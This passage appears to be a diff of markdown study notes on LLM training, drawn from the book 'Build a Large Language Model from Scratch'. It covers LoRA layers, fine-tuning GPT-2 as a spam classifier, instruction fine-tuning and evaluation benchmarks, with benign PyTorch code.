4. **Storage Efficiency**: After fine-tuning, instead of saving a **whole new model** for each task, you only need to store the **LoRA matrices**, which are tiny compared to the full model. This makes it easy to adapt the model to many tasks without using too much storage.
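
As a quick, back-of-the-envelope sketch (the layer size and rank below are arbitrary assumptions, not values from the book), you can see why the A/B decomposition saves parameters:

```python
# Hypothetical example: one 768x768 Linear layer vs. its LoRA update of rank 16
in_dim, out_dim, rank = 768, 768, 16

full_update_params = in_dim * out_dim            # a full delta-W matrix
lora_params = in_dim * rank + rank * out_dim     # A (in_dim x rank) + B (rank x out_dim)

print(f"Full update: {full_update_params} params")   # 589,824
print(f"LoRA (r=16): {lora_params} params")          # 24,576 (~24x fewer)
```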

To implement LoRA layers instead of the Linear ones during a fine-tuning, this code is proposed here [https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb):
```python
import math

# Create the LoRA layer with the 2 matrices and the alpha
class LoRALayer(torch.nn.Module):
    def __init__(self, in_dim, out_dim, rank, alpha):
        super().__init__()
        self.A = torch.nn.Parameter(torch.empty(in_dim, rank))
        torch.nn.init.kaiming_uniform_(self.A, a=math.sqrt(5))  # similar to standard weight initialization
        self.B = torch.nn.Parameter(torch.zeros(rank, out_dim))
        self.alpha = alpha

    def forward(self, x):
        x = self.alpha * (x @ self.A @ self.B)
        return x

# Combine it with the linear layer
class LinearWithLoRA(torch.nn.Module):
    def __init__(self, linear, rank, alpha):
        super().__init__()
        self.linear = linear
        self.lora = LoRALayer(
            linear.in_features, linear.out_features, rank, alpha
        )

    def forward(self, x):
        return self.linear(x) + self.lora(x)

# Replace linear layers with LoRA ones
def replace_linear_with_lora(model, rank, alpha):
    for name, module in model.named_children():
        if isinstance(module, torch.nn.Linear):
            # Replace the Linear layer with LinearWithLoRA
            setattr(model, name, LinearWithLoRA(module, rank, alpha))
        else:
            # Recursively apply the same function to child modules
            replace_linear_with_lora(module, rank, alpha)
```
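
A typical usage pattern (a sketch assuming the `model` instance and helpers defined above; the `rank`/`alpha` values are illustrative assumptions) is to freeze the original weights first and then swap in the LoRA layers, so that only the A and B matrices remain trainable:

```python
# Freeze every original parameter of the pre-trained model
for param in model.parameters():
    param.requires_grad = False

# Inject LoRA into every Linear layer; the new A/B parameters are trainable by default
replace_linear_with_lora(model, rank=16, alpha=16)

trainable = sum(p.numel() for p in model.parameters() if p.requires_grad)
total = sum(p.numel() for p in model.parameters())
print(f"Trainable params: {trainable} / {total}")  # only the A and B matrices are trainable
```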

## References

- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)

@ -1,117 +0,0 @@
# 7.1. Fine-Tuning for Classification

## What is

Fine-tuning is the process of taking a **pre-trained model** that has learned **general language patterns** from vast amounts of data and **adapting** it to perform a **specific task** or to understand domain-specific language. This is achieved by continuing the training of the model on a smaller, task-specific dataset, allowing it to adjust its parameters to better suit the nuances of the new data while leveraging the broad knowledge it has already acquired. Fine-tuning enables the model to deliver more accurate and relevant results in specialized applications without the need to train a new model from scratch.

> [!NOTE]
> As pre-training a LLM that "understands" the text is pretty expensive, it's usually easier and cheaper to fine-tune open source pre-trained models to perform the specific task we want them to perform.

> [!TIP]
> The goal of this section is to show how to fine-tune an already pre-trained model so that, instead of generating new text, the LLM gives the **probabilities of the given text being categorized in each of the given categories** (like whether a text is spam or not).

## Preparing the data set

### Data set size

Of course, in order to fine-tune a model you need some structured data to use to specialise your LLM. In the example proposed in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb), GPT2 is fine-tuned to detect if an email is spam or not using the data from [https://archive.ics.uci.edu/static/public/228/sms+spam+collection.zip](https://archive.ics.uci.edu/static/public/228/sms+spam+collection.zip).

This data set contains many more examples of "not spam" than of "spam", therefore the book suggests to **only use as many examples of "not spam" as of "spam"** (removing from the training data all the extra examples). In this case, this was 747 examples of each.

Then, **70%** of the data set is used for **training**, **10%** for **validation** and **20%** for **testing**. A minimal balancing/splitting sketch is shown after the following list.

- The **validation set** is used during the training phase to fine-tune the model's **hyperparameters** and make decisions about model architecture, effectively helping to prevent overfitting by providing feedback on how the model performs on unseen data. It allows for iterative improvements without biasing the final evaluation.
  - This means that although the data included in this data set is not used for the training directly, it's used to tune the best **hyperparameters**, so this set cannot be used to evaluate the performance of the model like the testing one.
- In contrast, the **test set** is used **only after** the model has been fully trained and all adjustments are complete; it provides an unbiased assessment of the model's ability to generalize to new, unseen data. This final evaluation on the test set gives a realistic indication of how the model is expected to perform in real-world applications.
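
The balancing and the 70/10/20 split can be done in a few lines. This is a hedged sketch assuming the SMS data has been loaded into a pandas `DataFrame`; the file name and the `Label`/`Text` column names are assumptions, not the notebook's exact code:

```python
import pandas as pd

df = pd.read_csv("sms_spam_collection.tsv", sep="\t", header=None, names=["Label", "Text"])

# Undersample "ham" (not spam) so both classes have the same number of examples
num_spam = (df["Label"] == "spam").sum()
ham_subset = df[df["Label"] == "ham"].sample(num_spam, random_state=123)
balanced = pd.concat([ham_subset, df[df["Label"] == "spam"]])

# Shuffle, then split 70% / 10% / 20%
balanced = balanced.sample(frac=1, random_state=123).reset_index(drop=True)
train_end = int(len(balanced) * 0.7)
val_end = train_end + int(len(balanced) * 0.1)
train_df, val_df, test_df = balanced[:train_end], balanced[train_end:val_end], balanced[val_end:]
```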

### Entries length

As the training example expects all the entries (email texts in this case) to have the same length, it was decided to make every entry as long as the largest one by appending the ids of `<|endoftext|>` as padding, as sketched below.
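
A minimal padding sketch (assuming the `tiktoken` GPT-2 tokenizer; the token id 50256 for `<|endoftext|>` is the standard GPT-2 value):

```python
import tiktoken

tokenizer = tiktoken.get_encoding("gpt2")
pad_id = tokenizer.encode("<|endoftext|>", allowed_special={"<|endoftext|>"})[0]  # 50256

texts = ["You won a free prize!", "See you tomorrow at the meeting"]
encoded = [tokenizer.encode(t) for t in texts]
max_len = max(len(e) for e in encoded)

# Right-pad every sequence with <|endoftext|> ids up to the longest entry
padded = [e + [pad_id] * (max_len - len(e)) for e in encoded]
print(padded)
```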

### Initialize the model

Using the open-source pre-trained weights, initialize the model to train. We have already done this before, and by following the instructions of [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb) you can easily do it.

## Classification head

In this specific example (predicting whether a text is spam or not), we are not interested in fine-tuning according to the complete vocabulary of GPT2; we only want the new model to say if the email is spam (1) or not (0). Therefore, we are going to **modify the final layer that** gives the probabilities per token of the vocabulary for one that only gives the probabilities of being spam or not (so like a vocabulary of 2 words).

```python
# This code modifies the final layer with a Linear one with 2 outputs
num_classes = 2
model.out_head = torch.nn.Linear(
    in_features=BASE_CONFIG["emb_dim"],
    out_features=num_classes
)
```

## Parameters to tune

In order to fine-tune fast, it's easier not to fine-tune all the parameters but only some final ones. This is because it's known that the lower layers generally capture basic language structures and semantics that are broadly applicable. So, just **fine-tuning the last layers is usually enough and faster**.

```python
# This code makes all the parameters of the model untrainable
for param in model.parameters():
    param.requires_grad = False

# Allow fine-tuning of the last transformer block
for param in model.trf_blocks[-1].parameters():
    param.requires_grad = True

# Allow fine-tuning of the final layer norm
for param in model.final_norm.parameters():
    param.requires_grad = True
```

## Entries to use for training

In previous sections the LLM was trained by reducing the loss of every predicted token, even though almost all the predicted tokens were in the input sentence (only 1 at the end was really predicted), so that the model would understand the language better.

In this case we only care about the model being able to predict if the text is spam or not, so we only care about the last token predicted. Therefore, it's needed to modify our previous training loss functions to only take that token into account.

This is implemented in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb) as:

```python
def calc_accuracy_loader(data_loader, model, device, num_batches=None):
    model.eval()
    correct_predictions, num_examples = 0, 0

    if num_batches is None:
        num_batches = len(data_loader)
    else:
        num_batches = min(num_batches, len(data_loader))
    for i, (input_batch, target_batch) in enumerate(data_loader):
        if i < num_batches:
            input_batch, target_batch = input_batch.to(device), target_batch.to(device)

            with torch.no_grad():
                logits = model(input_batch)[:, -1, :]  # Logits of last output token
            predicted_labels = torch.argmax(logits, dim=-1)

            num_examples += predicted_labels.shape[0]
            correct_predictions += (predicted_labels == target_batch).sum().item()
        else:
            break
    return correct_predictions / num_examples


def calc_loss_batch(input_batch, target_batch, model, device):
    input_batch, target_batch = input_batch.to(device), target_batch.to(device)
    logits = model(input_batch)[:, -1, :]  # Logits of last output token
    loss = torch.nn.functional.cross_entropy(logits, target_batch)
    return loss
```

Note how for each batch we are only interested in the **logits of the last token predicted**. The same idea is used at inference time, as sketched below.
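
Once fine-tuned, classifying a new text follows the same pattern: take the logits of the last token and pick the most likely of the 2 classes. This is a hedged sketch (the padding/truncation details and the label order spam=1 / not spam=0 are assumptions based on the dataset preparation above):

```python
def classify_text(text, model, tokenizer, device, max_length, pad_token_id=50256):
    model.eval()
    token_ids = tokenizer.encode(text)[:max_length]                 # truncate to the supported length
    token_ids += [pad_token_id] * (max_length - len(token_ids))     # pad with <|endoftext|>
    input_tensor = torch.tensor(token_ids, device=device).unsqueeze(0)  # add batch dimension

    with torch.no_grad():
        logits = model(input_tensor)[:, -1, :]   # logits of the last token only
    predicted_label = torch.argmax(logits, dim=-1).item()
    return "spam" if predicted_label == 1 else "not spam"

# Example (assumes the fine-tuned model, tokenizer and device from above):
# print(classify_text("You won a $1000 prize, click here!", model, tokenizer, device, max_length=120))
```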

## Complete GPT2 fine-tune classification code

You can find all the code to fine-tune GPT2 to be a spam classifier in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/load-finetuned-model.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/load-finetuned-model.ipynb)

## References

- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)

@ -1,100 +0,0 @@
# 7.2. Fine-Tuning to follow instructions

> [!TIP]
> The goal of this section is to show how to **fine-tune an already pre-trained model to follow instructions** rather than just generating text, for example, responding to tasks as a chat bot.

## Dataset

In order to fine-tune a LLM to follow instructions, it's needed to have a dataset with instructions and responses to fine-tune the LLM. There are different formats to train a LLM to follow instructions, for example:

- The Alpaca prompt style example:
```csharp
Below is an instruction that describes a task. Write a response that appropriately completes the request.

### Instruction:
Calculate the area of a circle with a radius of 5 units.

### Response:
The area of a circle is calculated using the formula \( A = \pi r^2 \). Plugging in the radius of 5 units:

\( A = \pi (5)^2 = \pi \times 25 = 25\pi \) square units.
```
- The Phi-3 prompt style example:
```vbnet
<|User|>
Can you explain what gravity is in simple terms?

<|Assistant|>
Absolutely! Gravity is a force that pulls objects toward each other.
```
Training a LLM with these kinds of datasets instead of just raw text helps the LLM understand that it needs to give specific answers to the questions it receives.

Therefore, one of the first things to do with a dataset that contains requests and responses is to model that data in the desired prompt format, like:
```python
# Code from https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/ch07.ipynb
def format_input(entry):
    instruction_text = (
        f"Below is an instruction that describes a task. "
        f"Write a response that appropriately completes the request."
        f"\n\n### Instruction:\n{entry['instruction']}"
    )

    input_text = f"\n\n### Input:\n{entry['input']}" if entry["input"] else ""

    return instruction_text + input_text

model_input = format_input(data[50])

desired_response = f"\n\n### Response:\n{data[50]['output']}"

print(model_input + desired_response)
```

Then, as usual, it's needed to separate the dataset into sets for training, validation and testing.

## Batching & Data Loaders

Then, it's needed to batch all the inputs and expected outputs for the training. For this, it's needed to:

- Tokenize the texts
- Pad all the samples to the same length (usually the length will be as big as the context length used to pre-train the LLM)
- Create the expected tokens by shifting the input by 1 in a custom collate function
- Replace some padding tokens with -100 to exclude them from the training loss: after the first `endoftext` token, substitute all the other `endoftext` tokens by -100 (because using `cross_entropy(...,ignore_index=-100)` means that it will ignore targets with -100)
- \[Optional\] Mask using -100 also all the tokens belonging to the question so the LLM learns only how to generate the answer. In the Alpaca style this will mean masking everything until `### Response:`

Having created this, it's time to create the data loaders for each dataset (training, validation and testing). A minimal sketch of such a collate function is shown below.
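
This is a hedged sketch of such a collate function (simplified and close in spirit to the book's notebook, but not its exact code; `pad_token_id=50256` is the GPT-2 `<|endoftext|>` id, and the optional masking of the prompt tokens is omitted):

```python
import torch

def custom_collate_fn(batch, pad_token_id=50256, ignore_index=-100, device="cpu"):
    # batch: list of token-id lists, each already formatted as prompt + response
    batch_max_length = max(len(item) + 1 for item in batch)
    inputs_lst, targets_lst = [], []

    for item in batch:
        new_item = item + [pad_token_id]                        # append one endoftext token
        padded = new_item + [pad_token_id] * (batch_max_length - len(new_item))
        inputs = torch.tensor(padded[:-1])                      # input = all but the last token
        targets = torch.tensor(padded[1:])                      # target = input shifted by 1

        # Keep the first endoftext as a target, mask the remaining padding with -100
        mask = targets == pad_token_id
        indices = torch.nonzero(mask).squeeze()
        if indices.numel() > 1:
            targets[indices[1:]] = ignore_index

        inputs_lst.append(inputs)
        targets_lst.append(targets)

    return torch.stack(inputs_lst).to(device), torch.stack(targets_lst).to(device)
```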

## Load pre-trained LLM & Fine tune & Loss Checking

It's needed to load a pre-trained LLM in order to fine-tune it. This was already discussed in other pages. Then, it's possible to use the previously used training function to fine-tune the LLM.

During the training it's also possible to see how the training loss and the validation loss vary during the epochs to see if the loss is getting reduced and if overfitting is occurring.\
Remember that overfitting occurs when the training loss keeps getting reduced but the validation loss is not being reduced or is even increasing. To avoid this, the simplest thing to do is to stop the training at the epoch where this behaviour starts.

## Response Quality

As this is not a classification fine-tuning where it's possible to trust the loss variations more, it's also important to check the quality of the responses on the testing set. Therefore, it's recommended to gather the generated responses from all the testing sets and **check their quality manually** to see if there are wrong answers (note that it's possible for the LLM to create correctly the format and syntax of the response sentence but give a completely wrong answer; the loss variation won't reflect this behaviour).\
Note that it's also possible to perform this review by passing the generated responses and the expected responses to **other LLMs and asking them to evaluate the responses**.

Other tests to run to verify the quality of the responses:

1. **Measuring Massive Multitask Language Understanding (**[**MMLU**](https://arxiv.org/abs/2009.03300)**):** MMLU evaluates a model's knowledge and problem-solving abilities across 57 subjects, including humanities, sciences, and more. It uses multiple-choice questions to assess understanding at various difficulty levels, from elementary to advanced professional.
2. [**LMSYS Chatbot Arena**](https://arena.lmsys.org): This platform allows users to compare responses from different chatbots side by side. Users input a prompt, and multiple chatbots generate responses that can be directly compared.
3. [**AlpacaEval**](https://github.com/tatsu-lab/alpaca_eval)**:** AlpacaEval is an automated evaluation framework where an advanced LLM like GPT-4 evaluates the responses of other models to various prompts.
4. **General Language Understanding Evaluation (**[**GLUE**](https://gluebenchmark.com/)**):** GLUE is a collection of nine natural language understanding tasks, including sentiment analysis, textual entailment, and question answering.
5. [**SuperGLUE**](https://super.gluebenchmark.com/)**:** Building upon GLUE, SuperGLUE includes more challenging tasks designed to be difficult for current models.
6. **Beyond the Imitation Game Benchmark (**[**BIG-bench**](https://github.com/google/BIG-bench)**):** BIG-bench is a large-scale benchmark with over 200 tasks testing a model's abilities in areas like reasoning, translation, and question answering.
7. **Holistic Evaluation of Language Models (**[**HELM**](https://crfm.stanford.edu/helm/lite/latest/)**):** HELM provides a comprehensive evaluation across various metrics like accuracy, robustness, and fairness.
8. [**OpenAI Evals**](https://github.com/openai/evals)**:** An open-source evaluation framework by OpenAI that allows the testing of AI models on custom and standardized tasks.
9. [**HumanEval**](https://github.com/openai/human-eval)**:** A collection of programming problems used to evaluate the code generation abilities of language models.
10. **Stanford Question Answering Dataset (**[**SQuAD**](https://rajpurkar.github.io/SQuAD-explorer/)**):** SQuAD consists of questions about Wikipedia articles, where models must comprehend the text to answer accurately.
11. [**TriviaQA**](https://nlp.cs.washington.edu/triviaqa/)**:** A large-scale dataset of trivia questions and answers, along with evidence documents.

and many, many more

## Follow instructions fine-tuning code

You can find an example of the code to perform this fine-tuning in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/gpt_instruction_finetuning.py](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/gpt_instruction_finetuning.py)

## References

- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)

@ -1,98 +0,0 @@
# LLM Training - Data Preparation

**These are my notes from the highly recommended book** [**https://www.manning.com/books/build-a-large-language-model-from-scratch**](https://www.manning.com/books/build-a-large-language-model-from-scratch) **with some extra information.**

## Basic Information

You should start by reading this post for some basic concepts you should know about:

{{#ref}}
0.-basic-llm-concepts.md
{{#endref}}

## 1. Tokenization

> [!TIP]
> The goal of this initial phase is very simple: **Split the input into tokens (ids) in a way that makes sense**.

{{#ref}}
1.-tokenizing.md
{{#endref}}

## 2. Data Sampling

> [!TIP]
> The goal of this second phase is very simple: **Sample the input data and prepare it for the training phase, usually by separating the dataset into sentences of a specific length and also generating the expected response.**

{{#ref}}
2.-data-sampling.md
{{#endref}}

## 3. Token Embeddings

> [!TIP]
> The goal of this third phase is very simple: **Assign each of the previous tokens in the vocabulary a vector of the desired dimensions to train the model.** Each word in the vocabulary will be a point in a space of X dimensions.\
> Note that initially the position of each word in the space is just initialised "randomly" and these positions are trainable parameters (they will be improved during the training).
>
> Moreover, during the token embedding **another layer of embeddings is created** which represents (in this case) the **absolute position of the word in the training sentence**. This way a word in different positions in the sentence will have a different representation (meaning).

{{#ref}}
3.-token-embeddings.md
{{#endref}}

## 4. Attention Mechanisms

> [!TIP]
> The goal of this fourth phase is very simple: **Apply some attention mechanisms**. These are going to be a lot of **repeated layers** that are going to **capture the relation of a word in the vocabulary with its neighbours in the current sentence being used to train the LLM**.\
> A lot of layers are used for this, so a lot of trainable parameters are going to be capturing this information.

{{#ref}}
4.-attention-mechanisms.md
{{#endref}}

## 5. LLM Architecture

> [!TIP]
> The goal of this fifth phase is very simple: **Develop the architecture of the full LLM**. Put everything together, apply all the layers and create all the functions to generate text or transform text to IDs and vice versa.
>
> This architecture will be used for both training the model and predicting text after it has been trained.

{{#ref}}
5.-llm-architecture.md
{{#endref}}

## 6. Pre-training & Loading models

> [!TIP]
> The goal of this sixth phase is very simple: **Train the model from scratch**. For this the previous LLM architecture will be used, with some loops going over the datasets using the defined loss functions and optimizer to train all the parameters of the model.

{{#ref}}
6.-pre-training-and-loading-models.md
{{#endref}}

## 7.0. LoRA Improvements in fine-tuning

> [!TIP]
> The use of **LoRA greatly reduces the computation** needed to **fine-tune** already trained models.

{{#ref}}
7.0.-lora-improvements-in-fine-tuning.md
{{#endref}}

## 7.1. Fine-Tuning for Classification

> [!TIP]
> The goal of this section is to show how to fine-tune an already pre-trained model so that, instead of generating new text, the LLM will give the **probabilities of the given text being categorized in each of the given categories** (like whether a text is spam or not).

{{#ref}}
7.1.-fine-tuning-for-classification.md
{{#endref}}

## 7.2. Fine-Tuning to follow instructions

> [!TIP]
> The goal of this section is to show how to **fine-tune an already pre-trained model to follow instructions** rather than just generating text, for example, responding to tasks as a chat bot.

{{#ref}}
7.2.-fine-tuning-to-follow-instructions.md
{{#endref}}